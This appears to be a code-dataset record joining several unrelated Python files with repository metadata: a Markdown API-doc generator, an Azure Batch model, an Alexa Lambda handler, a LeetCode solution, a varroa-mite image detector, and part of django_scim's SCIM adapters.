for line in doc.split("\n"):
indent = len(line) - len(line.lstrip())
if not md_code_snippet and not literal_block:
line = line.lstrip()
if line.startswith(">>>"):
# support for doctest
line = line.replace(">>>", "```") + "```"
if (
_RE_BLOCKSTART_LIST.match(line)
or _RE_BLOCKSTART_TEXT.match(line)
or _RE_QUOTE_TEXT.match(line)
):
# start of a new block
blockindent = indent
if quote_block:
quote_block = False
if literal_block:
# break literal block
out.append("```\n")
literal_block = False
out.append("\n\n**{}**\n".format(line.strip()))
arg_list = bool(_RE_BLOCKSTART_LIST.match(line))
if _RE_QUOTE_TEXT.match(line):
quote_block = True
out.append("\n>")
elif line.strip().startswith("```"):
# Code snippet is used
if md_code_snippet:
md_code_snippet = False
else:
md_code_snippet = True
out.append(line)
elif line.strip().endswith("::"):
# Literal Block Support: https://docutils.sourceforge.io/docs/user/rst/quickref.html#literal-blocks
literal_block = True
out.append(line.replace("::", ":\n```"))
elif quote_block:
out.append(line.strip())
elif line.strip().startswith("-"):
# Allow bullet lists
out.append("\n" + (" " * indent) + line)
elif indent > blockindent:
if arg_list and not literal_block and _RE_TYPED_ARGSTART.match(line):
# start of new argument
out.append(
"\n"
+ " " * blockindent
+ " - "
+ _RE_TYPED_ARGSTART.sub(r"<b>`\1`</b> (\2): \3", line)
)
argindent = indent
elif arg_list and not literal_block and _RE_ARGSTART.match(line):
# start of an exception-type block
out.append(
"\n"
+ " " * blockindent
+ " - "
+ _RE_ARGSTART.sub(r"<b>`\1`</b>: \2", line)
)
argindent = indent
elif indent > argindent:
# attach docs text of argument
# * (blockindent + 2)
out.append(" " + line)
else:
out.append(line)
else:
if line.strip() and literal_block:
# indent has changed, if not empty line, break literal block
line = "```\n" + line
literal_block = False
out.append(line)
if md_code_snippet:
out.append("\n")
elif not line and not quote_block:
out.append("\n\n")
elif not line and quote_block:
out.append("\n>")
else:
out.append(" ")
return "".join(out)
class MarkdownGenerator(object):
"""Markdown generator class."""
def __init__(
self,
src_root_path: Optional[str] = None,
src_base_url: Optional[str] = None,
remove_package_prefix: bool = False,
):
"""Initializes the markdown API generator.
Args:
src_root_path: The root folder name containing all the sources.
src_base_url: The base github link. Should include branch name.
All source links are generated with this prefix.
remove_package_prefix: If `True`, the package prefix will be removed from all functions and methods.
"""
self.src_root_path = src_root_path
self.src_base_url = src_base_url
self.remove_package_prefix = remove_package_prefix
self.generated_objects: List[Dict] = []
def _get_src_path(self, obj: Any, append_base: bool = True) -> str:
"""Creates a src path string with line info for use as markdown link.
Args:
obj (Any): Selected object to get the src path.
append_base (bool, optional): If `True`, the src repo url will be appended. Defaults to True.
Returns:
str: Source code path with line marker.
"""
src_root_path = None
if self.src_root_path:
src_root_path = os.path.abspath(self.src_root_path)
else:
return ""
try:
path = os.path.abspath(inspect.getsourcefile(obj)) # type: ignore
except Exception:
return ""
assert isinstance(path, str)
if src_root_path not in path:
# this can happen with e.g.
# inlinefunc-wrapped functions
if hasattr(obj, "__module__"):
path = "%s.%s" % (obj.__module__, obj.__name__)
else:
path = obj.__name__
assert isinstance(path, str)
path = path.replace(".", "/")
relative_path = os.path.relpath(path, src_root_path)
lineno = _get_line_no(obj)
lineno_hashtag = "" if lineno is None else "#L{}".format(lineno)
# add line hash
relative_path = relative_path + lineno_hashtag
if append_base and self.src_base_url:
relative_path = os.path.join(self.src_base_url, relative_path)
return relative_path
def func2md(self, func: Callable, clsname: str = "", depth: int = 3) -> str:
"""Takes a function (or method) and generates markdown docs.
Args:
func (Callable): Selected function (or method) for markdown generation.
clsname (str, optional): Class name to prepend to funcname. Defaults to "".
depth (int, optional): Number of # to append to class name. Defaults to 3.
Returns:
str: Markdown documentation for selected function.
"""
if _is_object_ignored(func):
# The function is ignored from generation
return ""
section = "#" * depth
funcname = func.__name__
modname = None
if hasattr(func, "__module__"):
modname = func.__module__
escfuncname = (
"%s" % funcname if funcname.startswith("_") else funcname
) # "`%s`"
full_name = "%s%s" % ("%s." % clsname if clsname else "", escfuncname)
header = full_name
if self.remove_package_prefix:
# TODO: Evaluate
# Only use the name
header = escfuncname
path = self._get_src_path(func)
doc = _doc2md(func)
summary = _get_doc_summary(func)
funcdef = _get_function_signature(
func, ignore_self=True, remove_package=self.remove_package_prefix
)
# split the function definition if it is too long
lmax = 80
if len(funcdef) > lmax:
funcdef = _get_function_signature(
func,
ignore_self=True,
wrap_arguments=True,
remove_package=self.remove_package_prefix,
)
if inspect.ismethod(func):
func_type = "classmethod"
else:
if _get_class_that_defined_method(func) is None:
func_type = "function"
else:
# function of a class
func_type = "method"
self.generated_objects.append(
{
"type": func_type,
"name": header,
"full_name": full_name,
"module": modname,
"anchor_tag": _get_anchor_tag(func_type + "-" + header),
"description": summary,
}
)
# build the signature
markdown = _FUNC_TEMPLATE.format(
section=section,
header=header,
funcdef=funcdef,
func_type=func_type,
doc=doc if doc else "*No documentation found.*",
)
if path:
markdown = _SOURCE_BADGE_TEMPLATE.format(path=path) + markdown
return markdown
def class2md(self, cls: Any, depth: int = 2) -> str:
"""Takes a class and creates markdown text to document its methods and variables.
Args:
cls (class): Selected class for markdown generation.
depth (int, optional): Number of # to append to function name. Defaults to 2.
Returns:
str: Markdown documentation for selected class.
"""
if _is_object_ignored(cls):
# The class is ignored from generation
return ""
section = "#" * depth
subsection = "#" * (depth + 2)
clsname = cls.__name__
modname = cls.__module__
header = clsname
path = self._get_src_path(cls)
doc = _doc2md(cls)
summary = _get_doc_summary(cls)
self.generated_objects.append(
{
"type": "class",
"name": header,
"full_name": header,
"module": modname,
"anchor_tag": _get_anchor_tag("class-" + header),
"description": summary,
}
)
try:
# object module should be the same as the calling module
if (
hasattr(cls.__init__, "__module__")
and cls.__init__.__module__ == modname
):
init = self.func2md(cls.__init__, clsname=clsname)
else:
init = ""
except (ValueError, TypeError):
# this happens if __init__ is outside the repo
init = ""
variables = []
for name, obj in inspect.getmembers(
cls, lambda a: not (inspect.isroutine(a) or inspect.ismethod(a))
):
if not name.startswith("_") and type(obj) == property:
comments = _doc2md(obj) or inspect.getcomments(obj)
comments = "\n\n%s" % comments if comments else ""
property_name = f"{clsname}.{name}"
if self.remove_package_prefix:
property_name = name
variables.append(
_SEPARATOR
+ "\n%s <kbd>property</kbd> %s%s\n"
% (subsection, property_name, comments)
)
handlers = []
for name, obj in inspect.getmembers(cls, inspect.ismethoddescriptor):
if (
not name.startswith("_")
and hasattr(obj, "__module__")
# object module should be the same as the calling module
and obj.__module__ == modname
):
handler_name = f"{clsname}.{name}"
if self.remove_package_prefix:
handler_name = name
handlers.append(
_SEPARATOR
+ "\n%s <kbd>handler</kbd> %s\n" % (subsection, handler_name)
)
methods = []
# for name, obj in getmembers(cls, inspect.isfunction):
for name, obj in inspect.getmembers(
cls, lambda a: inspect.ismethod(a) or inspect.isfunction(a)
):
if (
not name.startswith("_")
and hasattr(obj, "__module__")
and name not in handlers
# object module should be the same as the calling module
and obj.__module__ == modname
):
function_md = self.func2md(obj, clsname=clsname, depth=depth + 1)
if function_md:
methods.append(_SEPARATOR + function_md)
markdown = _CLASS_TEMPLATE.format(
section=section,
header=header,
doc=doc if doc else "",
init=init,
variables="".join(variables),
handlers="".join(handlers),
methods="".join(methods),
)
if path:
markdown = _SOURCE_BADGE_TEMPLATE.format(path=path) + markdown
return markdown
def module2md(self, module: types.ModuleType, depth: int = 1) -> str:
"""Takes an imported module object and create a Markdown string containing functions and classes.
Args:
module (types.ModuleType): Selected module for markdown generation.
depth (int, optional): Number of # to append before module heading. Defaults to 1.
Returns:
str: Markdown documentation for selected module.
"""
if _is_object_ignored(module):
# The module is ignored from generation
return ""
modname = module.__name__
doc = _doc2md(module)
summary = _get_doc_summary(module)
path = self._get_src_path(module)
found = []
self.generated_objects.append(
{
"type": "module",
"name": modname,
"full_name": modname,
"module": modname,
"anchor_tag": _get_anchor_tag("module-" + modname),
"description": summary,
}
)
classes: List[str] = []
line_nos: List[int] = []
for name, obj in inspect.getmembers(module, inspect.isclass):
# handle classes
found.append(name)
if (
not name.startswith("_")
and hasattr(obj, "__module__")
and obj.__module__ == modname
):
class_markdown = self.class2md(obj, depth=depth + 1)
if class_markdown:
classes.append(_SEPARATOR + class_markdown)
line_nos.append(_get_line_no(obj) or 0)
classes = _order_by_line_nos(classes, line_nos)
functions: List[str] = []
line_nos = []
for name, obj in inspect.getmembers(module, inspect.isfunction):
# handle functions
found.append(name)
if (
not name.startswith("_")
and hasattr(obj, "__module__")
and obj.__module__ == modname
):
function_md = self.func2md(obj, depth=depth + 1)
if function_md:
functions.append(_SEPARATOR + function_md)
line_nos.append(_get_line_no(obj) or 0)
functions = _order_by_line_nos(functions, line_nos)
variables: List[str] = []
line_nos = []
for name, obj in module.__dict__.items():
if not name.startswith("_") and name not in found:
if hasattr(obj, "__module__") and obj.__module__ != modname:
continue
if hasattr(obj, "__name__") and not obj.__name__.startswith(modname):
continue
comments = inspect.getcomments(obj)
comments = ": %s" % comments if comments else ""
variables.append("- **%s**%s" % (name, comments))
line_nos.append(_get_line_no(obj) or 0)
variables = _order_by_line_nos(variables, line_nos)
if variables:
new_list = ["\n**Global Variables**", "---------------", *variables]
variables = new_list
markdown = _MODULE_TEMPLATE.format(
header=modname,
section="#" * depth,
doc=doc,
global_vars="\n".join(variables) if variables else "",
functions="\n".join(functions) if functions else "",
classes="".join(classes) if classes else "",
)
if path:
markdown = _SOURCE_BADGE_TEMPLATE.format(path=path) + markdown
return markdown
def import2md(self, obj: Any, depth: int = 1) -> str:
"""Generates markdown documentation for a selected object/import.
Args:
obj (Any): Selcted object for markdown docs generation.
depth (int, optional): Number of # to append before heading. Defaults to 1.
Returns:
str: Markdown documentation of selected object.
"""
if inspect.isclass(obj):
return self.class2md(obj, depth=depth)
elif isinstance(obj, types.ModuleType):
return self.module2md(obj, depth=depth)
elif callable(obj):
return self.func2md(obj, depth=depth)
else:
print(f"Could not generate markdown for object type {str(type(obj))}")
return ""
def overview2md(self) -> str:
"""Generates a documentation overview file based on the generated docs."""
entries_md = ""
for obj in list(
filter(lambda d: d["type"] == "module", self.generated_objects)
):
full_name = obj["full_name"]
if "module" in obj:
link = "./" + obj["module"] + ".md#" + obj["anchor_tag"]
else:
link = "#unknown"
description = obj["description"]
entries_md += f"\n- [`{full_name}`]({link})"
if description:
entries_md += ": " + description
if not entries_md:
entries_md = "\n- No modules"
modules_md = entries_md
entries_md = ""
for obj in list(filter(lambda d: d["type"] == "class", self.generated_objects)):
module_name = obj["module"].split(".")[-1]
name = module_name + "." + obj["full_name"]
link = "./" + obj["module"] + ".md#" + obj["anchor_tag"]
description = obj["description"]
entries_md += f"\n- [`{name}`]({link})"
if description:
entries_md += ": " + description
if not entries_md:
entries_md = "\n- No classes"
classes_md = entries_md
entries_md = ""
for obj in list(
filter(lambda d: d["type"] == "function", self.generated_objects)
):
module_name = obj["module"].split(".")[-1]
name = module_name + "." + obj["full_name"]
link = "./" + obj["module"] + ".md#" + obj["anchor_tag"]
description = obj["description"]
entries_md += f"\n- [`{name}`]({link})"
if description:
entries_md += ": " + description
if not entries_md:
entries_md = "\n- No functions"
functions_md = entries_md
return _OVERVIEW_TEMPLATE.format(
modules=modules_md, classes=classes_md, functions=functions_md
)
def generate_docs(
paths: List[str],
output_path: str = "./docs",
src_root_path: Optional[str] = None,
src_base_url: Optional[str] = None,
remove_package_prefix: bool = False,
ignored_modules: Optional[List[str]] = None,
overview_file: Optional[str] = None,
watermark: bool = True,
validate: bool = False,
) -> None:
"""Generates markdown documentation for provided paths based on Google-style docstrings.
Args:
paths: Selected paths or import name for markdown generation.
output_path: The output path for the creation of the markdown files. Set this to `stdout` to print all markdown to stdout.
src_root_path: The root folder name containing all the sources. Fallback to git repo root.
src_base_url: The base url of the github link. Should include branch name. All source links are generated with this prefix.
remove_package_prefix: If `True`, the package prefix will be removed from all functions and methods.
ignored_modules: A list of modules that should be ignored.
overview_file: Filename of overview file. If not provided, no overview file will be generated.
watermark: If `True`, add a watermark with a timestamp to bottom of the markdown files.
validate: If `True`, validate the docstrings via pydocstyle. Requires pydocstyle to be installed.
"""
stdout_mode = output_path.lower() == "stdout"
if not stdout_mode and not os.path.exists(output_path):
# Create output path
os.makedirs(output_path)
if not ignored_modules:
ignored_modules = list()
if not src_root_path:
try:
# Set src root path to git root
src_root_path = (
subprocess.Popen(
["git", "rev-parse", "--show-toplevel"], stdout=subprocess.PIPE
)
.communicate()[0]
.rstrip()
.decode("utf-8")
)
if src_root_path and src_base_url is None and not stdout_mode:
# Set base url to be relative to the git root folder based on output_path
src_base_url = os.path.relpath(
src_root_path, os.path.abspath(output_path)
)
except Exception:
# Ignore all exceptions
pass
# Initialize Markdown Generator
generator = MarkdownGenerator(
src_root_path=src_root_path,
src_base_url=src_base_url,
remove_package_prefix=remove_package_prefix,
)
pydocstyle_cmd = "pydocstyle --convention=google --add-ignore=D100,D101,D102,D103,D104,D105,D107,D202"
for path in paths: # lgtm [py/non-iterable-in-for-loop]
if os.path.isdir(path):
if validate and subprocess.call(f"{pydocstyle_cmd} {path}", shell=True) > 0:
raise Exception(f"Validation for {path} failed.")
if not stdout_mode:
print(f"Generating docs for python package at: {path}")
# Generate one file for every discovered module
for loader, module_name, _ in pkgutil.walk_packages([path]):
if _is_module_ignored(module_name, ignored_modules):
# Add module to ignore list, so submodule will also be ignored
ignored_modules.append(module_name)
continue
try:
mod = loader.find_module(module_name).load_module(module_name) # type: ignore
module_md = generator.module2md(mod)
if not module_md:
# Module md is empty -> ignore module and all submodules
# Add module to ignore list, so submodule will also be ignored
ignored_modules.append(module_name)
continue
if stdout_mode:
print(module_md)
else:
to_md_file(
module_md,
mod.__name__,
out_path=output_path,
watermark=watermark,
)
except Exception as ex:
print(
f"Failed to generate docs for module {module_name}: " + repr(ex)
)
elif os.path.isfile(path):
if validate and subprocess.call(f"{pydocstyle_cmd} {path}", shell=True) > 0:
raise Exception(f"Validation for {path} failed.")
if not stdout_mode:
print(f"Generating docs for python module at: {path}")
module_name = os.path.basename(path)
spec = importlib.util.spec_from_file_location(
module_name,
path,
)
assert spec is not None
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod) # type: ignore
if mod:
module_md = generator.module2md(mod)
if stdout_mode:
print(module_md)
else:
to_md_file(
module_md,
module_name,
out_path=output_path,
watermark=watermark,
)
else:
raise Exception(f"Failed to generate markdown for {path}")
else:
# Path seems to be an import
obj = locate(path)
if obj is not None:
# TODO: function to get path to file whatever the object is
# if validate:
# subprocess.call(
# f"pydocstyle --convention=google {obj.__file__}", shell=True
# )
if not stdout_mode:
print(f"Generating docs for python import: {path}")
if hasattr(obj, "__path__"):
# Object is a package
for loader, module_name, _ in pkgutil.walk_packages(
path=obj.__path__, # type: ignore
prefix=obj.__name__ + ".", # type: ignore
):
if _is_module_ignored(module_name, ignored_modules):
# Add module to ignore list, so submodule will also be ignored
ignored_modules.append(module_name)
continue
try:
mod = loader.find_module(module_name).load_module( # type: ignore
module_name
)
module_md = generator.module2md(mod)
if not module_md:
# Module MD is empty -> ignore module and all submodules
# Add module to ignore list, so submodule will also be ignored
ignored_modules.append(module_name)
continue
if stdout_mode:
print(module_md)
else:
to_md_file(
module_md,
mod.__name__,
out_path=output_path,
watermark=watermark,
)
except Exception as ex:
print(
f"Failed to generate docs for module {module_name}: "
+ repr(ex)
)
else:
import_md = generator.import2md(obj)
if stdout_mode:
print(import_md)
else:
to_md_file(
import_md, path, out_path=output_path, watermark=watermark
)
else:
raise Exception(f"Failed to generate markdown for {path}.")
if overview_file and not stdout_mode:
if not overview_file.endswith(".md"):
overview_file = overview_file + ".md"
to_md_file(
generator.overview2md(),
overview_file,
out_path=output_path,
watermark=watermark,
)
# Write mkdocs pages file
print("Writing mkdocs .pages file.")
# TODO: generate navigation items to fix problem with naming
with open(os.path.join(output_path, ".pages"), "w") as f:
f.write(_MKDOCS_PAGES_TEMPLATE.format(overview_file=overview_file))
| 34.539234
| 131
| 0.548673
|
4a15b1d9cbe38ce73879dc7d328698a43c2690ce
| 2,275
|
py
|
Python
|
azure-batch/azure/batch/models/node_update_user_parameter.py
|
jmalobicky/azure-sdk-for-python
|
61234a3d83f8fb481d1dd2386e54e888864878fd
|
[
"MIT"
] | 1
|
2022-03-30T22:39:15.000Z
|
2022-03-30T22:39:15.000Z
|
azure-batch/azure/batch/models/node_update_user_parameter.py
|
jmalobicky/azure-sdk-for-python
|
61234a3d83f8fb481d1dd2386e54e888864878fd
|
[
"MIT"
] | 54
|
2016-03-25T17:25:01.000Z
|
2018-10-22T17:27:54.000Z
|
azure-batch/azure/batch/models/node_update_user_parameter.py
|
jmalobicky/azure-sdk-for-python
|
61234a3d83f8fb481d1dd2386e54e888864878fd
|
[
"MIT"
] | 2
|
2017-01-20T18:25:46.000Z
|
2017-05-12T21:31:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class NodeUpdateUserParameter(Model):
"""The set of changes to be made to a user account on a node.
:param password: The password of the account. The password is required for
Windows nodes (those created with 'cloudServiceConfiguration', or created
with 'virtualMachineConfiguration' using a Windows image reference). For
Linux compute nodes, the password can optionally be specified along with
the sshPublicKey property. If omitted, any existing password is removed.
:type password: str
:param expiry_time: The time at which the account should expire. If
omitted, the default is 1 day from the current time. For Linux compute
nodes, the expiryTime has a precision up to a day.
:type expiry_time: datetime
:param ssh_public_key: The SSH public key that can be used for remote
login to the compute node. The public key should be compatible with
OpenSSH encoding and should be base 64 encoded. This property can be
specified only for Linux nodes. If this is specified for a Windows node,
then the Batch service rejects the request; if you are calling the REST
API directly, the HTTP status code is 400 (Bad Request). If omitted, any
existing SSH public key is removed.
:type ssh_public_key: str
"""
_attribute_map = {
'password': {'key': 'password', 'type': 'str'},
'expiry_time': {'key': 'expiryTime', 'type': 'iso-8601'},
'ssh_public_key': {'key': 'sshPublicKey', 'type': 'str'},
}
def __init__(self, password=None, expiry_time=None, ssh_public_key=None):
super(NodeUpdateUserParameter, self).__init__()
self.password = password
self.expiry_time = expiry_time
self.ssh_public_key = ssh_public_key
| 46.428571
| 78
| 0.67033
|
4a15b26563567dd3a11bc6c085483d82e455658a
| 1,306
|
py
|
Python
|
python/alexa_skill/lambda_function.py
|
calestar/experiments
|
6bebf93706334d601694ba51bf4011f788757ff8
|
[
"MIT"
] | 1
|
2021-11-03T02:23:13.000Z
|
2021-11-03T02:23:13.000Z
|
python/alexa_skill/lambda_function.py
|
calestar/experiments
|
6bebf93706334d601694ba51bf4011f788757ff8
|
[
"MIT"
] | 4
|
2021-08-31T22:13:34.000Z
|
2022-02-14T03:36:40.000Z
|
python/alexa_skill/lambda_function.py
|
calestar/experiments
|
6bebf93706334d601694ba51bf4011f788757ff8
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2020, 2021 Jean-Sebastien Gelinas, see LICENSE at the root of the repository
import json
def send_response(success, result):
response = {
'version': '1.0',
'sessionAttributes': {},
'shouldEndSession': True,
'response': {
'outputSpeech' : {
'type': 'PlainText',
'text': result,
'playBehavior': 'REPLACE_ENQUEUED',
},
},
}
if success:
response['response']['card'] = {
'type': 'Simple',
'title': 'Success',
'content': result,
}
print('Response ***************')
print(json.dumps(response))
return response
def lambda_handler(request, context):
print('Request ***************')
print(json.dumps(request))
if context is not None:
print('Context ***************')
print(context)
if 'request' not in request:
return send_response(False, 'Bad configuration')
intent = request['request']['intent']['name']
print(f"Intent: '{intent}'")
for name, slot in request['request']['intent']['slots'].items():
value = slot['slotValue']['value']
print(f"Slot '{name}': '{value}'")
return send_response(True, f"Alright, I'll run {value}")
| 25.607843
| 92
| 0.529096
|
4a15b2ddeac0bd5a6e932fea52897d55111fbba6
| 797
|
py
|
Python
|
507.perfect-number.py
|
elfgzp/leetCode
|
964c6574d310a9a6c486bf638487fd2f72b83b3f
|
[
"MIT"
] | 3
|
2019-04-12T06:22:56.000Z
|
2019-05-04T04:25:01.000Z
|
507.perfect-number.py
|
elfgzp/Leetcode
|
964c6574d310a9a6c486bf638487fd2f72b83b3f
|
[
"MIT"
] | null | null | null |
507.perfect-number.py
|
elfgzp/Leetcode
|
964c6574d310a9a6c486bf638487fd2f72b83b3f
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode.cn id=507 lang=python3
#
# [507] 完美数
#
# https://leetcode-cn.com/problems/perfect-number/description/
#
# algorithms
# Easy (32.39%)
# Total Accepted: 3.4K
# Total Submissions: 10.4K
# Testcase Example: '28'
#
# 对于一个 正整数,如果它和除了它自身以外的所有正因子之和相等,我们称它为“完美数”。
#
# 给定一个 正整数 n, 如果他是完美数,返回 True,否则返回 False
#
#
#
# 示例:
#
#
# 输入: 28
# 输出: True
# 解释: 28 = 1 + 2 + 4 + 7 + 14
#
#
#
#
# 注意:
#
# 输入的数字 n 不会超过 100,000,000. (1e8)
#
#
class Solution(object):
def checkPerfectNumber(self, num):
"""
:type num: int
:rtype: bool
"""
if num <= 1:
return False
sum = 1
for i in range(2, int(num**0.5) + 1):
if num % i == 0:
sum += i
sum += num / i
return sum == num
| 15.037736
| 62
| 0.51192
|
4a15b359ff7103a32d42ef15000756deba6e93ca
| 4,489
|
py
|
Python
|
zdo2021/main.py
|
JiriVales/zdo2021-vales
|
8cf22097d926b42814b4d366dfe49f1de70093a7
|
[
"MIT"
] | 1
|
2021-05-26T14:58:58.000Z
|
2021-05-26T14:58:58.000Z
|
zdo2021/main.py
|
JiriVales/zdo2021-vales
|
8cf22097d926b42814b4d366dfe49f1de70093a7
|
[
"MIT"
] | null | null | null |
zdo2021/main.py
|
JiriVales/zdo2021-vales
|
8cf22097d926b42814b4d366dfe49f1de70093a7
|
[
"MIT"
] | null | null | null |
import numpy as np
import skimage
from skimage import data
from skimage.morphology import label
from skimage.color import rgb2gray
from skimage import data
from skimage.filters import gaussian
from skimage.segmentation import active_contour
import skimage.segmentation
import scipy
import numpy as np
import scipy
from scipy import ndimage
class VarroaDetector():
def __init__(self):
pass
def predict(self, data):
"""
:param data: np.ndarray with shape [pocet_obrazku, vyska, sirka, barevne_kanaly]
:return: shape [pocet_obrazku, vyska, sirka], 0 - nic, 1 - varroa destructor
"""
pocetobrazku = data.shape[0]
vyska = data.shape[1]
sirka = data.shape[2]
kanaly = data.shape[3]
#Parametry ze zjistovaci mnoziny (20 klestiku):
#Prah (klestici vyrazne tmavsi nez zbyla cast)
prah = 0.2
#Velikost
# rozsah area varoa:
areamin = 100
areamax = 200
#Elipticky-tvar:
# rozdil konvexni obalky s obsahem:
rkonvexmax = 0.1
# rozsah nekompaktnosti:
maxnekompakt = 21
minnekompakt = 13
# rozsah pomeru os:
maxpomer = 1.6
minpomer = 1.2
result = []
for i in range(pocetobrazku):
# nacteni obrazku:
aktualniobrazek = data[i]
# stupne sedi:
img = skimage.color.rgb2gray(aktualniobrazek)
# prahovani:
imthr = img < prah
# vyplni diry - kvuli lesku klestiku:
imthr = ndimage.binary_fill_holes(imthr)
# label (vyselektovani jednotlivych obektu)
imlabel = label(imthr, background=0)
# pocet prvku
#pocetvstupnichprvku = np.max(imlabel)
#print(pocetvstupnichprvku)
#zjistovani charakteristik:
props = skimage.measure.regionprops(imlabel)
pocetdetekovanych = 0 #pocet detekovanych
varoa = 0 #detekovana varroa?
spatnedetekovane = []
#projit vsechny objekty:
for i in range(len(props)):
convexarea = props[i].convex_area # plocha konvexni obalky
area = props[i].area # plocha
rozdilkonvexarea = (convexarea - area)/((convexarea+area)/2) # rozdil konvexni obalky a area
perimeter = props[i].perimeter # obvod
nekompaktnost = (perimeter*perimeter)/area # vypocet nekompaktnosti
major = props[i].major_axis_length # hlavni osa
minor =props[i].minor_axis_length # vedlejsi osa
if minor == 0: # nedelit nulou
minor = 0.0000001
pomeros = major/minor # pomer os
if area < areamax and area > areamin: # splnuje velikost
if rozdilkonvexarea < rkonvexmax: # splnuje dalsi vlastnosti eliptickeho tvaru
if nekompaktnost < maxnekompakt and nekompaktnost > minnekompakt:
if pomeros < maxpomer and pomeros > minpomer:
pocetdetekovanych +=1
ci = props[i].image
else:
spatnedetekovane.append(props[i].label)
else:
spatnedetekovane.append(props[i].label)
else:
spatnedetekovane.append(props[i].label)
else:
spatnedetekovane.append(props[i].label)
#print(pocetdetekovanych)
if pocetdetekovanych > 0:
varroa = 1
#vymazat spatne
imlabel[np.isin(imlabel, spatnedetekovane)] = 0
# vysledny obrazek
vyslednyobr = imthr < imlabel
# obrazek hotov, vloz ho mezi vysledky
result.append(vyslednyobr)
# obrazek hotov, vloz ho mezi vysledky
navratovahodnota = np.array(result)
return navratovahodnota
| 33.5
| 119
| 0.510581
|
4a15b39bc359ee70849b5c370afde703041f2ac2
| 21,544
|
py
|
Python
|
src/django_scim/adapters.py
|
15five/django_scim
|
d833026aaefaeed23e5a4a765c9d1ca699d94e01
|
[
"MIT"
] | 39
|
2017-02-24T23:33:13.000Z
|
2022-03-31T23:31:20.000Z
|
src/django_scim/adapters.py
|
15five/django_scim
|
d833026aaefaeed23e5a4a765c9d1ca699d94e01
|
[
"MIT"
] | 46
|
2017-09-22T20:57:41.000Z
|
2022-03-03T01:17:05.000Z
|
src/django_scim/adapters.py
|
15five/django_scim
|
d833026aaefaeed23e5a4a765c9d1ca699d94e01
|
[
"MIT"
] | 25
|
2017-01-12T00:44:36.000Z
|
2021-12-03T14:48:24.000Z
|
"""
Adapters are used to convert the data model described by the SCIM 2.0
specification to a data model that fits the data provided by the application
implementing a SCIM api.
For example, in a Django app, there are User and Group models that do
not have the same attributes/fields that are defined by the SCIM 2.0
specification. The Django User model has both ``first_name`` and ``last_name``
attributes but the SCIM speicifcation requires this same data be sent under
the names ``givenName`` and ``familyName`` respectively.
An adapter is instantiated with a model instance. Eg::
user = get_user_model().objects.get(id=1)
scim_user = SCIMUser(user)
...
"""
from typing import Optional, Union
from urllib.parse import urljoin
from django import core
from django.contrib.auth import get_user_model
from django.urls import reverse
from scim2_filter_parser.attr_paths import AttrPath
from . import constants, exceptions
from .utils import (
get_base_scim_location_getter,
get_group_adapter,
get_group_filter_parser,
get_user_adapter,
get_user_filter_parser,
)
class SCIMMixin(object):
ATTR_MAP = {}
id_field = 'scim_id' # Modifiable by overriding classes
def __init__(self, obj, request=None):
self.obj = obj
self._request = request
@property
def request(self):
if self._request:
return self._request
raise RuntimeError('Adapter is not associated with a request object. '
'Set object.request to avoid this error.')
@request.setter
def request(self, value):
self._request = value
@property
def id(self):
return str(getattr(self.obj, self.id_field))
@property
def path(self):
return reverse(self.url_name, kwargs={'uuid': self.id})
@property
def location(self):
return urljoin(get_base_scim_location_getter()(self.request), self.path)
def to_dict(self):
"""
Return a ``dict`` conforming to the object's SCIM Schema,
ready for conversion to a JSON object.
"""
d = {
'id': self.id,
'externalId': self.obj.scim_external_id,
}
return d
def validate_dict(self, d):
"""
Validate dict from SCIM call.
Currently this method only validates:
- the most common attributes
- attributes against their expected types
"""
for key, value in d.items():
expected_type = {
'active': bool,
}.get(key)
if expected_type and not isinstance(value, expected_type):
raise exceptions.BadRequestError(
f'''"{key}" should be of type "{expected_type.__name__}". '''
f'''Got type "{type(value).__name__}"'''
)
def from_dict(self, d):
"""
Consume a ``dict`` conforming to the object's SCIM Schema, updating the
internal object with data from the ``dict``.
This method is overridden and called by subclass adapters. Please make
changes there.
"""
scim_external_id = d.get('externalId')
self.obj.scim_external_id = scim_external_id or ''
def save(self):
self.obj.save()
def delete(self):
self.obj.__class__.objects.filter(id=self.id).delete()
def handle_operations(self, operations):
"""
The SCIM specification allows for making changes to specific attributes
of a model. These changes are sent in PATCH requests and are batched into
operations to be performed on a object. Operations can have an op code
of 'add', 'remove', or 'replace'. This method iterates through all of the
operations in ``operations`` and calls the appropriate handler (defined
on the appropriate adapter) for each.
Django-scim2 only provides a partial implementation of PATCH call
handlers. The RFC (https://tools.ietf.org/html/rfc7644#section-3.5.2)
specifies a number of requirements for a full PATCH implementation.
This implementation does not meet all of those requirements. For
example, these are some features that have been left out.
Add Operations:
- If the target location does not exist, the attribute and value
are added.
Remove Operations:
- If the target location is a multi-valued attribute and a complex
filter is specified comparing a "value", the values matched by the
filter are removed. If no other values remain after removal of
the selected values, the multi-valued attribute SHALL be
considered unassigned.
Replace Operations:
- If the target location path specifies an attribute that does not
exist, the service provider SHALL treat the operation as an "add".
"""
for operation in operations:
path = operation.get('path')
value = operation.get('value')
paths_and_values = self.parse_path_and_values(path, value)
for path, value in paths_and_values:
self.handle_path_and_value(path, value, operation)
def handle_path_and_value(self,
path: AttrPath,
value: Union[str, list, dict],
operation: dict):
op_code = operation.get('op').lower()
if op_code not in constants.VALID_PATCH_OPS:
raise exceptions.BadRequestError(f'Unknown PATCH op "{op_code}"')
if op_code == 'remove' and not path:
msg = '"path" must be specified during "remove" PATCH calls'
raise exceptions.BadRequestError(msg, scim_type='noTarget')
validate_method = 'validate_op_' + op_code
handler = getattr(self, validate_method, self._default_validate_op)
if handler:
handler(path, value, operation)
handle_method = 'handle_' + op_code
handler = getattr(self, handle_method)
handler(path, value, operation)
def _default_validate_op(self,
path: Optional[AttrPath],
value: Union[str, list, dict],
operation: dict):
"""
Validate the operation.
Currently this method only validates:
- the most common attributes
- simple paths
- attributes against their expected types
"""
expected_type = None
if path and not path.is_complex:
expected_type = {
('active', None, None): bool,
}.get(path.first_path)
if expected_type and not isinstance(value, expected_type):
raise exceptions.BadRequestError(
f'''"{operation['path']}" should be of type "{expected_type.__name__}". '''
f'''Got type "{type(value).__name__}"'''
)
def parse_path_and_values(self,
path: Optional[str],
value: Union[str, list, dict]) -> list:
